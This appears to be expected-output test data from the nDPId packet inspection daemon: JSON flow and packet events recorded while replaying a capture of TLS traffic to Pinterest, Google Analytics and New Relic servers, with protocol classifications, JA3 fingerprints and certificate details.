+00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14990,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gDHlsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACADvvoBu4vV8Grv31OMgBACdmBfAAABAQgK5dFc6cK4oqI="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289728586,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289728586,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14991,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605289728586,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728586,"pkt":"qtsDr8lk5EKm5WPyht1gCU2wACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnnABu1oBJQ4\/rrWNgBAQLrKDAAABAQgKyRWFssK4oqI="} 
+00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14992,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgVAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu++u\/fU4yL1fBrgBALkLtnAAABAQgKwrla3eXPQIw="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14993,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605289728804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289728804,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbuecD+utY1aASUPgBAZXAuxAAABAQgKwrla48kTaxY="} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732959,"flow_last_seen":1605289732959,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732959,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605289732959,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732959,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7gAAAAAoAL9IOnRAAACBAWgBAIICtZiaYQAAAAAAQMDBw=="} +00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732972,"flow_last_seen":1605289732972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732972,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} 
+00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} +00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} 
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,li
nk.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
